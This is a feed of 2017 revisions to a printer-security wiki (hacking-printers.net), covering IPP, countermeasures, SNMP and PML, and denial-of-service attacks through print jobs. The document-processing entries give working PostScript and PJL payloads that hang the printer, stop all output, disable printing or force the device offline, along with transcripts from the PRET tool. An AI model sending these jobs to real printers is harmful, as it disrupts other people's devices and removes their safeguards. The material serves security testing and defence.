Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is not further exploited except for [[Accounting bypass|accounting bypasses]].&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- , printer language discovery and cross-site printing attacks. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Countermeasures&amp;diff=310</id>
		<title>Countermeasures</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Countermeasures&amp;diff=310"/>
				<updated>2017-01-31T08:25:20Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: /* Vendors */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Most attacks against printers are enabled because there is no clear distinction between [[Fundamentals#Page_Description_Languages|page description]] and [[Fundamentals#Printer_Control_Languages|printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks.&lt;br /&gt;
&lt;br /&gt;
== Vendors ==&lt;br /&gt;
&lt;br /&gt;
Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like [[PostScript]] from one day to the next would break compatibility with existing printer drivers, and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented [[PJL]] extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their ‘hidden functions’ and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. &lt;br /&gt;
&lt;br /&gt;
Code signing however also means technically restricting users to run vendor software &amp;lt;ref&amp;gt;This issue has also been discussed by the FSF when HP announced to introduce code signing for their printers: ‘[https://www.fsf.org/blogs/licensing/restricted-printers Fixing rogue printers: don't trade one security threat for another]’&amp;lt;/ref&amp;gt;. Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by &amp;lt;ref&amp;gt;''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005&amp;lt;/ref&amp;gt; who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers.&lt;br /&gt;
&lt;br /&gt;
== Admins ==&lt;br /&gt;
&lt;br /&gt;
Network administrators should never leave their printers accessible from the Internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attacker's ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. The print server should completely ignore PJL commands and convert PostScript code to another page description language or to a ‘defused’ version using CUPS' ''ps2write'' filter and disallow access to raw print queues. Printers should be completely sandboxed, isolating them from the rest of the network to mitigate the harm in case they are rooted. It must however be noted that print servers themselves can be a target of attacks, for example using the techniques discussed in [[Beyond Printers]]. A schematic view of the VLAN sandboxing approach is given below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Dedicated-print-server.png|600px|Dedicated print server as a countermeasure to sandbox printers]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Furthermore, if supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques.&lt;br /&gt;
&lt;br /&gt;
== Users ==&lt;br /&gt;
&lt;br /&gt;
Employees should be trained to never leave the copy room unlocked and to report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator as they may be traces of a [[cross-site printing]] attack. All other dispensable hard copies should be shredded, even if they apparently do not contain confidential data.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=SNMP&amp;diff=309</id>
		<title>SNMP</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=SNMP&amp;diff=309"/>
				<updated>2017-01-31T08:21:51Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 &amp;lt;ref&amp;gt;''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000&amp;lt;/ref&amp;gt;. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). A MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the &amp;lt;code&amp;gt;hrDeviceDescr&amp;lt;/code&amp;gt; value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 &amp;lt;ref&amp;gt;''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993&amp;lt;/ref&amp;gt; is shown below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=sh&amp;gt;&lt;br /&gt;
snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1&lt;br /&gt;
iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: &amp;quot;hp LaserJet 4250&amp;quot;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer models, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 &amp;lt;ref&amp;gt;''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004&amp;lt;/ref&amp;gt;. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to &amp;lt;code&amp;gt;public&amp;lt;/code&amp;gt; by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so-called [[PML]] commands.&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[PML]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=SNMP&amp;diff=308</id>
		<title>SNMP</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=SNMP&amp;diff=308"/>
				<updated>2017-01-31T08:20:33Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 &amp;lt;ref&amp;gt;''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000&amp;lt;/ref&amp;gt;. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). An MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the &amp;lt;code&amp;gt;hrDeviceDescr&amp;lt;/code&amp;gt; value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 &amp;lt;ref&amp;gt;''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993&amp;lt;/ref&amp;gt; is shown below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=sh&amp;gt;&lt;br /&gt;
snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1&lt;br /&gt;
iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: &amp;quot;hp LaserJet 4250&amp;quot;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer models, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 &amp;lt;ref&amp;gt;''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004&amp;lt;/ref&amp;gt;. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to &amp;lt;code&amp;gt;public&amp;lt;/code&amp;gt; by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so-called [[PML]] commands.&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[PML]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=PML&amp;diff=307</id>
		<title>PML</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=PML&amp;diff=307"/>
				<updated>2017-01-31T08:20:11Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''TBD: This article needs further explanation'''&lt;br /&gt;
&lt;br /&gt;
The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released, however parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines PML as ‘an object-oriented request-reply printer management protocol’ &amp;lt;ref&amp;gt;''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11&amp;lt;/ref&amp;gt; and gives an introduction to the basics of the syntax. PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp), but an attacker is still able to print using one of the various techniques discussed in [[deployment channels]]. The use of PML within a print job retrieving the &amp;lt;code&amp;gt;hrDeviceDescr&amp;lt;/code&amp;gt; value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=sh&amp;gt;&lt;br /&gt;
&amp;gt; @PJL DMINFO ASCIIHEX=&amp;quot;000006030302010301&amp;quot;&lt;br /&gt;
&amp;lt; &amp;quot;8000000603030201030114106870204c617365724a65742034323530&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The trailing part of the string returned by the printer, &amp;lt;code&amp;gt;6870204c617365724a65742034323530&amp;lt;/code&amp;gt;, is hexadecimal for &amp;lt;code&amp;gt;hp LaserJet 4250&amp;lt;/code&amp;gt; – equivalent to the [[SNMP|snmpget example]]. As can be seen, it is possible to invoke (a subset of) SNMP commands over PJL via PML. A security-sensitive use of PML is to reset HP printers to [[factory defaults]] via ordinary print jobs, thereby removing protection mechanisms like user-set passwords.&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[SNMP]], [[Factory defaults]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=PML&amp;diff=306</id>
		<title>PML</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=PML&amp;diff=306"/>
				<updated>2017-01-31T08:15:11Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''TBD: This article needs further explanation'''&lt;br /&gt;
&lt;br /&gt;
The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released, however parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines PML as ‘an object-oriented request-reply printer management protocol’ &amp;lt;ref&amp;gt;''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11&amp;lt;/ref&amp;gt; and gives an introduction to the basics of the syntax. PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp), but an attacker is still able to print using one of the various techniques discussed in [[deployment channels]]. The use of PML within a print job retrieving the &amp;lt;code&amp;gt;hrDeviceDescr&amp;lt;/code&amp;gt; value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=sh&amp;gt;&lt;br /&gt;
&amp;gt; @PJL DMINFO ASCIIHEX=&amp;quot;000006030302010301&amp;quot;&lt;br /&gt;
&amp;lt; &amp;quot;8000000603030201030114106870204c617365724a65742034323530&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The trailing part of the string returned by the printer, &amp;lt;code&amp;gt;6870204c617365724a65742034323530&amp;lt;/code&amp;gt;, is hexadecimal for &amp;lt;code&amp;gt;hp LaserJet 4250&amp;lt;/code&amp;gt; – equivalent to the [[SNMP|snmpget example]]. As one can see, with PML it is possible to invoke (a subset of) SNMP commands over PJL. One security-sensitive use of PML is to reset HP printers to [[factory defaults]] via ordinary print jobs, thereby removing protection mechanisms like user-set passwords.&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[SNMP]], [[Factory defaults]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Document_processing&amp;diff=305</id>
		<title>Document processing</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Document_processing&amp;diff=305"/>
				<updated>2017-01-31T08:09:36Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: /* Infinite loops */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] can be used to upload permanent macros or fonts until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed.&lt;br /&gt;
&lt;br /&gt;
== PostScript ==&lt;br /&gt;
&lt;br /&gt;
=== Infinite loops ===&lt;br /&gt;
&lt;br /&gt;
One trivial example of an infinite loop written in PostScript is given below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=postscript&amp;gt;&lt;br /&gt;
%!&lt;br /&gt;
{} loop&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This minimalist document keeps a PostScript interpreter busy forever. In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel, while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent.&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
Use [[PRET]]'s ''hang'' command in ''ps'' mode:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer ps&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; hang&lt;br /&gt;
 Warning: This command causes an infinite loop rendering the&lt;br /&gt;
 device useless until manual restart. Press CTRL+C to abort.&lt;br /&gt;
 Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
=== Redefine showpage ===&lt;br /&gt;
&lt;br /&gt;
Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]]. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=postscript&amp;gt;&lt;br /&gt;
true 0 startjob&lt;br /&gt;
/showpage {} def&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
Use [[PRET]]'s ''disable'' command in ''ps'' mode:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer ps&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; disable&lt;br /&gt;
 Disabling printing functionality&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
== PJL ==&lt;br /&gt;
&lt;br /&gt;
=== PJL jobmedia ===&lt;br /&gt;
&lt;br /&gt;
Proprietary PJL commands &amp;lt;ref&amp;gt;''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany&amp;lt;/ref&amp;gt; can be used to set older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below:&lt;br /&gt;
&lt;br /&gt;
 @PJL SET SERVICEMODE=HPBOISEID&lt;br /&gt;
 @PJL DEFAULT JOBMEDIA=OFF&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
Use [[PRET]]'s ''disable'' command in ''pjl'' mode:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer pjl&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; disable&lt;br /&gt;
 Printing functionality: OFF&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
=== Offline mode ===&lt;br /&gt;
&lt;br /&gt;
In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown below:&lt;br /&gt;
&lt;br /&gt;
 @PJL OPMSG DISPLAY=&amp;quot;PAPER JAM IN ALL DOORS&amp;quot;&lt;br /&gt;
&lt;br /&gt;
The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the ''online'' button on the control panel.&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
Use [[PRET]]'s ''offline'' command in ''pjl'' mode:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer pjl&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; offline &amp;quot;MESSAGE TO DSIPLAY&amp;quot;&lt;br /&gt;
 Warning: Taking the printer offline will prevent yourself and others&lt;br /&gt;
 from printing or re-connecting to the device. Press CTRL+C to abort.&lt;br /&gt;
 Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Document_processing&amp;diff=304</id>
		<title>Document processing</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Document_processing&amp;diff=304"/>
				<updated>2017-01-31T08:07:57Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] can be used to upload permanent macros or fonts until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed.&lt;br /&gt;
&lt;br /&gt;
== PostScript ==&lt;br /&gt;
&lt;br /&gt;
=== Infinite loops ===&lt;br /&gt;
&lt;br /&gt;
One trivial example of an infinite loop written in PostScript is given below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=postscript&amp;gt;&lt;br /&gt;
%!&lt;br /&gt;
{} loop&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This minimalist document keeps a PostScript interpreter busy forever. In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel, while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent.&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
Use [[PRET]]'s ''hang'' command in ''ps'' mode:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer ps&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; hang&lt;br /&gt;
 Warning: This command causes an infinite loop rendering the&lt;br /&gt;
 device useless until manual restart. Press CTRL+C to abort.&lt;br /&gt;
 Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
=== Redefine showpage ===&lt;br /&gt;
&lt;br /&gt;
Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]]. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=postscript&amp;gt;&lt;br /&gt;
true 0 startjob&lt;br /&gt;
/showpage {} def&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
Use [[PRET]]'s ''disable'' command in ''ps'' mode:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer ps&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; disable&lt;br /&gt;
 Disabling printing functionality&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
== PJL ==&lt;br /&gt;
&lt;br /&gt;
=== PJL jobmedia ===&lt;br /&gt;
&lt;br /&gt;
Proprietary PJL commands &amp;lt;ref&amp;gt;''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany&amp;lt;/ref&amp;gt; can be used to set older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below:&lt;br /&gt;
&lt;br /&gt;
 @PJL SET SERVICEMODE=HPBOISEID&lt;br /&gt;
 @PJL DEFAULT JOBMEDIA=OFF&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
Use [[PRET]]'s ''disable'' command in ''pjl'' mode:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer pjl&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; disable&lt;br /&gt;
 Printing functionality: OFF&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
=== Offline mode ===&lt;br /&gt;
&lt;br /&gt;
In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown below:&lt;br /&gt;
&lt;br /&gt;
 @PJL OPMSG DISPLAY=&amp;quot;PAPER JAM IN ALL DOORS&amp;quot;&lt;br /&gt;
&lt;br /&gt;
The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the ''online'' button on the control panel.&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
Use [[PRET]]'s ''offline'' command in ''pjl'' mode:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer pjl&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; offline &amp;quot;MESSAGE TO DSIPLAY&amp;quot;&lt;br /&gt;
 Warning: Taking the printer offline will prevent yourself and others&lt;br /&gt;
 from printing or re-connecting to the device. Press CTRL+C to abort.&lt;br /&gt;
 Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Port_9100_printing&amp;diff=303</id>
		<title>Port 9100 printing</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Port_9100_printing&amp;diff=303"/>
				<updated>2017-01-31T08:05:44Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Raw-deployment-channel.png|thumb|180px|Printing over port 9100]]&lt;br /&gt;
&lt;br /&gt;
